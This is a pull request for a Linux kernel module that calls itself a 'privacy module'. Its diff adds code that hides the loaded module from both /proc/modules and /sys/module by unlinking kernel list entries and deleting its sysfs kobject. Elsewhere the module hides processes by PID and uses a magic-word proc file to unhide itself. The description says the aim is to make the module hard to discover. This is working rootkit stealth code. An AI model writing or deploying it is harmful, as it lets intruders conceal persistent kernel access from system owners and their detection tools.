### PR TITLE
Handle hide/unhide sysfs

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -4,8 +4,8 @@ ARCH=arch/x86
 
 MOD_PROC_FILE=
 
-# WALLY_PROC_FILE, /proc/<name>, change this if you wish
-COMPILER_OPTIONS := -Werror -Wall -DWALLY_PROC_FILE='"wally"'
+# PROCNAME, /proc/<name>, change this if you wish
+COMPILER_OPTIONS := -Werror -Wall -DPROCNAME='"wally"' -DMODNAME='"wally"'
 EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}
 
 SRC := src/${OBJNAME}.c src/kernel_addr.c src/pid.c src/fs.c
@@ -22,11 +22,7 @@ all:
 
 clean:
 	@make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
-	@rm -f .hide* *.o src/*.o
-	@find . -name "*.swp" |xargs rm -fv 2>/dev/null
-	@find . -name "*.swo" |xargs rm -fv 2>/dev/null
-	@find . -name "*.swx" |xargs rm -fv 2>/dev/null
-	@find . -name "*~" |xargs rm -fv 2>/dev/null
+	@rm -f *.o src/*.o
 	@rm -f ./tests/test
 	@echo "Clean."
 

--- a/src/wally.c
+++ b/src/wally.c
@@ -1,11 +1,8 @@
 /**
- * Wally simple privacy tool
- *
  * Written by hash <carloslack@gmail.com>
- * Sat Sep  6 22:29:12 BRT 2014
+ * Copyright (c) 2020 Carlos Carvalho
  *
- * Kernel version < 4.0.0
- *
+ * Kernel version <= 5.3.0
  */
 #include <linux/export.h>
 #include <linux/init.h>
@@ -19,14 +16,22 @@
 #include <linux/fs.h>
 #include <linux/seq_file.h>
 #include <linux/uaccess.h>
+#include <linux/kobject.h>
+#include <linux/sysfs.h>
+#include <linux/device.h>
+#include <linux/cdev.h>
+#include <linux/kref.h>
 
 #include "kernel_addr.h"
 #include "randbytes.h"
 
 #define MAX_PROCFS_SIZE 64
 #define MAX_MAGIC_WORD_SIZE MAX_PROCFS_SIZE
-#ifndef WALLY_PROC_FILE
-#error "Missing \'WALLY_PROC_FILE\' compilation directive. See Makefile."
+#ifndef MODNAME
+#pragma message "Missing \'MODNAME\' compilation directive. See Makefile."
+#endif
+#ifndef PROCNAME
+#error "Missing \'PROCNAME\' compilation directive. See Makefile."
 #endif
 
 extern void hide_task_by_pid(pid_t pid);
@@ -38,30 +43,224 @@ struct __lkmmod_t{ struct module *this_mod; };
 static char *magic_word;
 
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,4,0)
-#pragma message "!! Warning: Unsupported kernel version !!"
+#pragma message "!! Warning: Unsupported kernel version GOOD LUCK !!"
 #endif
 
 #define WALLY_DECLARE_MOD()                                           \
     MODULE_LICENSE("GPL");                                            \
-    MODULE_AUTHOR("Carlos Carvalho <carloslack@gmail.com>");          \
-    MODULE_DESCRIPTION("Wally - privacy module for paranoid people");
+    MODULE_AUTHOR("Carlos Carvalho");                                 \
+    MODULE_DESCRIPTION("privacy module for paranoid people");
 
 static struct list_head *mod_list;
 static const struct __lkmmod_t lkmmod = {
     .this_mod = THIS_MODULE,
 };
 
-static void wally_hide_mod(void) {
-    if(!mod_list) {
-        mod_list = lkmmod.this_mod->list.prev;
-        list_del(&(lkmmod.this_mod->list));
-    }
+/*
+ * kernel structures so the compiler
+ * can know about sizes and data types
+ */
+
+// kernel/params.c
+struct param_attribute
+{
+    struct module_attribute mattr;
+    const struct kernel_param *param;
+};
+
+struct module_param_attrs
+{
+    unsigned int num;
+    struct attribute_group grp;
+    struct param_attribute attrs[0];
+};
+
+// kernel/module.c
+struct module_sect_attr {
+    struct module_attribute mattr;
+    char *name;
+    unsigned long address;
+};
+struct module_sect_attrs {
+    struct attribute_group grp;
+    unsigned int nsections;
+    struct module_sect_attr attrs[0];
+};
+
+/*
+ * sysfs restoration helpers.
+ * Mostly copycat from the kernel with
+ * slightly modifications to handle only a subset
+ * of sysfs files
+ */
+static ssize_t show_refcnt(struct module_attribute *mattr,
+        struct module_kobject *mk, char *buffer){
+    return sprintf(buffer, "%i\n", module_refcount(mk->mod));
 }
-static void wally_unhide_mod(void) {
-    if(mod_list) {
-        list_add(&(lkmmod.this_mod->list), mod_list);
-        mod_list = NULL;
+static struct module_attribute modinfo_refcnt =
+    __ATTR(refcnt, 0444, show_refcnt, NULL);
+
+static struct module_attribute *modinfo_attrs[] = {
+    &modinfo_refcnt,
+    NULL,
+};
+
+static void module_remove_modinfo_attrs(struct module *mod)
+{
+    struct module_attribute *attr;
+
+    attr = &mod->modinfo_attrs[0];
+    if (attr && attr->attr.name) {
+        sysfs_remove_file(&mod->mkobj.kobj, &attr->attr);
+        if (attr->free)
+            attr->free(mod);
     }
+    kfree(mod->modinfo_attrs);
+}
+
+static int module_add_modinfo_attrs(struct module *mod)
+{
+    struct module_attribute *attr;
+    struct module_attribute *temp_attr;
+    int error = 0;
+
+    mod->modinfo_attrs = kzalloc((sizeof(struct module_attribute) *
+                (ARRAY_SIZE(modinfo_attrs) + 1)),
+            GFP_KERNEL);
+    if (!mod->modinfo_attrs)
+        return -ENOMEM;
+
+    temp_attr = mod->modinfo_attrs;
+    attr = modinfo_attrs[0];
+    if (!attr->test || attr->test(mod)) {
+        memcpy(temp_attr, attr, sizeof(*temp_attr));
+        sysfs_attr_init(&temp_attr->attr);
+        error = sysfs_create_file(&mod->mkobj.kobj,
+                &temp_attr->attr);
+        if (error)
+            goto error_out;
+        ++temp_attr;
+    }
+
+    return 0;
+
+error_out:
+    module_remove_modinfo_attrs(mod);
+    return error;
+}
+
+/*
+ * Remove the module entries
+ * in /proc/modules and /sys/module/<MODNAME>
+ * Also backup references needed for
+ * wally_unhide_mod()
+ */
+struct rmmod_controller {
+    struct kobject *parent;
+    struct module_sect_attrs *attrs;
+};
+static struct rmmod_controller rmmod_ctrl;
+
+static void wally_hide_mod(void) {
+    if (NULL != mod_list)
+        return;
+    /*
+     *  sysfs looks more and less
+     *  like this, before removal:
+     *
+     *  /sys/module/<MODNAME>/
+     *  ├── coresize
+     *  ├── holders
+     *  ├── initsize
+     *  ├── initstate
+     *  ├── notes
+     *  ├── refcnt
+     *  ├── sections
+     *  │   ├── __bug_table
+     *  │   └── __mcount_loc
+     *  ├── srcversion
+     *  ├── taint
+     *  └── uevent
+     */
+
+    // Backup and remove this module from /proc/modules
+    mod_list = lkmmod.this_mod->list.prev;
+    list_del(&(lkmmod.this_mod->list));
+
+    // Backup and remove this module from sysfs
+    rmmod_ctrl.attrs = lkmmod.this_mod->sect_attrs;
+    rmmod_ctrl.parent = lkmmod.this_mod->mkobj.kobj.parent;
+    kobject_del(lkmmod.this_mod->holders_dir->parent);
+}
+
+/*
+ * Restore the module entries in
+ * /proc/modules and /sys/module/<module>/
+ * After this function is called the best next
+ * thing to do is to rmmod the module.
+ */
+static void wally_unhide_mod(void) {
+    int err;
+    struct kobject *kobj;
+
+    if (!mod_list)
+        return;
+
+    /*
+     * sysfs is tied inherently to kernel objects, here
+     * we restore the bare minimum of sysfs entries
+     * that will be needed when rmmod comes
+     *
+     * sysfs will look like this
+     * after restoration:
+     *
+     * /sys/module/<MODNAME>/
+     * ├── holders
+     * ├── refcnt
+     * └── sections
+     *   └── __mcount_loc
+     */
+
+     // MODNAME is the parent kernel object
+    err = kobject_add(&(lkmmod.this_mod->mkobj.kobj), rmmod_ctrl.parent, "%s", MODNAME);
+    if (err)
+        goto out_put_kobj;
+
+    // holders parent is this module's object
+    kobj = kobject_create_and_add("holders", &(lkmmod.this_mod->mkobj.kobj));
+    if (!kobj)
+        goto out_put_kobj;
+
+    lkmmod.this_mod->holders_dir = kobj;
+
+    // Create sysfs representation of kernel objects
+    err = sysfs_create_group(&(lkmmod.this_mod->mkobj.kobj), &rmmod_ctrl.attrs->grp);
+    if (err)
+        goto out_put_kobj;
+
+    // Setup attributes
+    err = module_add_modinfo_attrs(lkmmod.this_mod);
+    if (err)
+        goto out_attrs;
+
+    // Restore /proc/module entry
+    list_add(&(lkmmod.this_mod->list), mod_list);
+    goto out_put_kobj;
+
+out_attrs:
+    // Rewind attributes
+    if (lkmmod.this_mod->mkobj.mp) {
+        sysfs_remove_group(&(lkmmod.this_mod->mkobj.kobj), &lkmmod.this_mod->mkobj.mp->grp);
+        if (lkmmod.this_mod->mkobj.mp)
+            kfree(lkmmod.this_mod->mkobj.mp->grp.attrs);
+        kfree(lkmmod.this_mod->mkobj.mp);
+        lkmmod.this_mod->mkobj.mp = NULL;
+    }
+
+out_put_kobj:
+    // Decrement refcount
+    kobject_put(&(lkmmod.this_mod->mkobj.kobj));
+    mod_list = NULL;
 }
 WALLY_DECLARE_MOD();
 
@@ -74,7 +273,7 @@ static char* get_unhide_magic_word(void) {
 }
 
 static int proc_dummy_show(struct seq_file *seq, void *data) {
-    seq_printf(seq, "Where is Waldo?\n");
+    seq_printf(seq, "0\n");
     return 0;
 }
 
@@ -139,7 +338,7 @@ static const struct file_operations proc_file_fops = {
 static void do_remove_proc(void) {
     if(WallyProcFileEntry) {
 #if LINUX_VERSION_CODE < KERNEL_VERSION(3,9,0)
-        remove_proc_entry(WALLY_PROC_FILE, NULL);
+        remove_proc_entry(PROCNAME, NULL);
 #else
         proc_remove(WallyProcFileEntry);
 #endif
@@ -162,7 +361,7 @@ static int __init wally_init(void) {
 
 
 try_reload:
-    WallyProcFileEntry = proc_create(WALLY_PROC_FILE, S_IRUSR | S_IWUSR, NULL, &proc_file_fops);
+    WallyProcFileEntry = proc_create(PROCNAME, S_IRUSR | S_IWUSR, NULL, &proc_file_fops);
     if(lock && !WallyProcFileEntry)
         goto proc_file_error;
     if(!lock) {
@@ -199,17 +398,16 @@ addr_error:
 magic_word_error:
     printk(KERN_ERR "Could not load magic word. proc file not created\n");
 leave:
-    printk(KERN_INFO "wally loaded.\n");
+    printk(KERN_INFO "%s loaded.\n", MODNAME);
     return 0;
 }
 
 static void __exit wally_cleanup(void) {
-   if(magic_word != NULL)
+    if(magic_word != NULL)
         kfree(magic_word);
-
-   wally_data_cleanup();
-   do_remove_proc();
-   printk(KERN_INFO "wally unloaded.\n");
+    wally_data_cleanup();
+    do_remove_proc();
+    printk(KERN_INFO "wally unloaded.\n");
 }
 
 module_init(wally_init);


### PR DESCRIPTION
This is a mini-milestone - hiding the module
from /proc/modules is a must have, however we were
not hiding it from sysfs and that's a problem that
made the discovery of this lkm very trivial.

So we now have to handle kobjects, something
that, since this is not an actual driver, we should not
have to worry about, however sysfs is tightly related to kernel
objects, being the RAM mirror in the filesystem that serves
as communication between kernel and userland.

If we remove its sysfs entries it become impossible for
rmmod (libkmod) to unload the module as it will validate the entries
before unlinking the module from the kernel. So the solution
is to put back some sysfs attributes, only the essential ones,
for this module so we can safely hide/unhide/rmmod it, without
rebooting.